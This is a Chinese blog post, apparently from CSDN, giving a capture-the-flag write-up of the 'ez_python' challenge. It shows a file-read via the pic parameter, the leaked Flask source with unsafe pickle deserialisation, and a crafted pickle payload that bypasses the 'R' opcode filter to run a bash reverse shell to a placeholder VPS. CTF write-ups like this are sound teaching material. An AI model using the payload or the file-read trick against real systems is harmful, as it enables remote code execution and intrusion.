第一届“长城杯”网络安全大赛 ez_python

最新推荐文章于 2023-07-02 01:42:47 发布
最新推荐文章于 2023-07-02 01:42:47 发布
阅读量1.5k 收藏 5
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/120387077
版权

在这里插入图片描述

利用LFI读文件 /?pic=/home/app/app.py
在这里插入图片描述

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))
    
    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)

在这里插入图片描述

Python反序列化 但过滤了R指令,reduce__与R指令是绑定的,禁止了R指令就禁止了__reduce 方法
使用这篇博客中的方法:https://blog.csdn.net/a3320315/article/details/105180444
在这里插入图片描述

b"\x80\x03c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubVbash -c 'bash -i >& /dev/tcp/vps_ip/port 0>&1'\nb."

base64加密生成cookie
带着这个user去访问,vps开启监听
在这里插入图片描述在这里插入图片描述

Arnoldqqq
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ez.py:python中的ez
03-04
该模块可轻松与linux,Mac OS X和Windows shell进行交互。 jerryzhujian9_at_gmail.com已在python 2.7下测试在终端:python -V或python中查看您的python版本:import sys; 打印(sys.version)=========================================== =安装: //pypi.python.org/pypi/ez pip install ez没有依赖关系 几乎所有命令都支持在路径中使用“〜”,“ ..”,“。”,“?”,“ *”(ls,fls仅支持正则表达式)。 符号链接本身是文件操作的目标。 实际文件应该是安全的。 另请参见pyg.py debug(1/0) #0 =一切将实际执行#1 =模拟cp,mv,execute的操作; 其他命令将实际执行。 将打印出模
长城杯2021 Crypto writeup
weixin_56678592的博客
10-02 516
长城杯2021 Crypto writeup #1 baby_rsa: 题目: #!/usr/bin/env python3 from Crypto.Util.number import * from secret import flag, v1, v2, m1, m2 def enc_1(val): p, q = pow(v1, (m1+1))-pow((v1+1), m1), pow(v2, (m2+1))-pow((v2+1), m2) assert isPrime(p) and
记一道rsa题---第一届长城杯网络安全大赛
Luiino的博客
10-19 731
且n =fac[0]*fac[1]*fac[2]*(((fac[0]+fac[1]+fac[2])
python网络安全实战_基于Python网络爬虫实战
weixin_39907850的博客
11-24 225
文件的操作:一般都要使用os模块和os.path模块import os.pathos.path.exists('D:\\Python\\1.txt')#判断文件是否存在abspath(path)#返回path所在的绝对路径dirname(p)#返回目录的路径exists(path)#判断文件是否存在getatime(filename)#返回文件的最后访问时间getctime(filename)#...
[NISACTF 2022]ezpython
weixin_61154173的博客
10-31 682
re简单题
第一届长城杯 第三赛区 半决赛 AWD 源码
最新发布
04-23
第一届长城杯 第三赛区 半决赛 AWD 源码
长城哈弗M6 PLUS_02_主动安全防护系统_汽车驾驶教学操作视频车辆使用指南手册功能演示介绍详解说明书.mp4
08-30
完整版(10个视频39.9元):https://download.csdn.net/download/yingcai111/21737515
长城小标宋体_长城小标宋体_长城_
10-04
长城小标宋体.该字体用于java开发中使用。
长城杯-钢筋施工方案.doc
04-22
建筑结构长城杯工程质量评审标准(DBJ/T01-69-2003) 建筑安装分项工程施工工艺规程(DBJ/T01-26-2003) 建筑工程冬期施工规程(JGJ104-97) 施工组织设计 XX施工组织设计 其他 图纸会审记录 建设部《房屋...
长城哈弗F7x_50_网络设置_汽车驾驶教学操作视频车辆使用指南手册功能演示介绍详解说明书.mp4
09-01
完整版(72个视频59.9元):https://download.csdn.net/download/yingcai111/21762149
2021长城杯WP
qq_49422880的博客
04-21 788
2021长城杯WPMISCWEB MISC WEB
[uaf + off by one -> stdout leak libc] 长城杯pwn1
huzai9527的博客
09-22 423
1. ida分析 存在uaf 和 off by one,可以实现任意地址写 没有show函数,且保护全开,不能修改got表 2. 思路 使用stdout爆破,泄漏libc 先申请几个chunk,通过off by one,构造chunk lapping 再通过uaf修改fd,构成任意地址写 注意点就是,想法设法构造chunk复用 uaf + off by one 总结一下就是,先del构造fastbin,再改chunk head构造unstored bin,再申请一个不是fastbin大小的chunk覆
CTF—easypy
m0_69773707的博客
06-26 308
扫目录,有download路由,下载源码。phpstudy漏洞修改admin密码。勾选系统权限,查看文件并下载flag。过滤了r和反弹shell直接外带。
py逆向-NSSCTF-[NISACTF 2022]ezpython
m0_73393932的博客
04-14 1277
逆向
[NISACTF 2022]ezpython(PyInstaller封装程序反编译)
qq_24481913的博客
12-24 729
[NISACTF 2022]ezpython(PyInstaller封装程序反编译)
ctf夺旗赛
m0_63017769的博客
11-12 5504
好久以前做过的ctf
2022-长城杯初赛Write up-by EchoSec安全团队
echosec的博客
08-29 2199
EchoSec安全团队参加的首场比赛,在各位师傅们的输出下,也拿到第8名的成绩,虽然不算特别好,也是EchoSec安全团队迈出的第一步。同时欢迎各位有兴趣的师傅加入我们,一起学习进步。可+v:He1l_T4lk。...
CTF2021陕西wp-web-ez_checkin
weixin_45090021的博客
07-02 413
通过对比md5的漏洞分析PHP在处理科学计数法的时候如果是0exxx会当成0,所以如果一个数字是0exxx它经过md4最后也是0exxx,那么他们就(==弱等于),在这里需要说明一下0e后面必须是数字才能实现(==弱等于)。强等于:两个MD5的数据必须是同一类型比如说prarma2=e9510081ac30ffa83f10b68cde1cac07¶ma3=6666这个的值一个是数值一个是字母不是同一类型不能进行绕过,然后可以使用数组绕过。最后一个是MD5强等于类型前面两个是MD5弱类型。
python 反序列化
m0_62970186的博客
04-03 5350
python 反序列化
python用turtle画长城
05-18
下面是使用Python的turtle库画长城的示例代码: ```python import turtle # 设置画布大小和背景颜色 turtle.setup(800, 600) turtle.bgcolor("#e2e2e2") # 设置画笔颜色和宽度 turtle.pensize(3) turtle.pencolor...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值